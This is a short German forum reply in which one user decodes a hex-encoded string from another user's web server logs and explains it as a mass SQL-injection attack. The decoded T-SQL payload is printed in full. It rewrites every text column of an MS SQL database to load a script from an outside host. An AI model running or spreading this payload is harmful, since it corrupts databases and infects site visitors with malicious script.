Moin Patrick,

Aber solche hier beobachte ich seit wenigen Wochen verstärkt:
[...]
Jemand eine Idee, was das ist, bzw. schon mal in den Logs beobachtet?

habe ich selbst noch nicht gesehen. Aber es sieht nach einer Art Angriff auf eine DB aus. Wenn man den langen, in Hexwerten formulierten String mal im Klartext ausformuliert, sieht der so aus:

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] cet ['+@C+']=''"></title><script src="http://www3.ss11qn.cn/csrss/w.js"></script><!--/'+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www3.ss11qn.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Scheint so, als erwarte jemand ein bestimmtes DBMS und ein bestimmtes CMS, und versucht dann ein Javascript von http://www3.ss11qn.cn/csrss/w.js in die im CMS gespeicherten Seiten einzuschleusen. Dieses Script bindet wiederum einen unsichtbaren iframe ein - weiter hatte ich keine Lust mehr zu untersuchen.

So long,
 Martin